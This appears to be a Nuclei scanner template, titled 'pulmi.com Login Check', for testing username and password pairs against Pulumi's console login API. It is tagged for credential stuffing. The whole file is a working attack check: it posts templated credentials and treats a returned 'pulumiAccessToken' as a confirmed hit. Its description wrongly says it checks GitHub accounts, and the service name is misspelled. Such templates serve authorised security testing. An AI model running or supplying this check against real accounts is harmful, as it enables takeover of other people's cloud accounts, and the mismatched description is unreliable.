漏洞描述
Checks for a valid github account.
id: pulmi-login-check
info:
name: pulmi.com Login Check
author: parthmalhotra,pdresearch
severity: critical
description: Checks for a valid github account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
max-request: 1
tags: cloud,creds-stuffing,login-check,pulmi
self-contained: true
http:
- raw:
- |
POST https://api.pulumi.com/api/console/email/login HTTP/1.1
Host: api.pulumi.com
Content-Type: application/json
Origin: https://app.pulumi.com
Referer: https://app.pulumi.com/
{"emailOrLogin":"{{username}}","password":"{{password}}"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- pulumiAccessToken
- userInfo
- type: status
status:
- 200
# digest: 4a0a00473045022100bcd86909c3922d82be8618faee752c026af752628e8d55e340c0656ea71b09f2022063c49d1bb74591c97427145cae8c3eac61b2f249e3e115fc1535995ad1564860:922c64590222798bb761d5b6d8e72950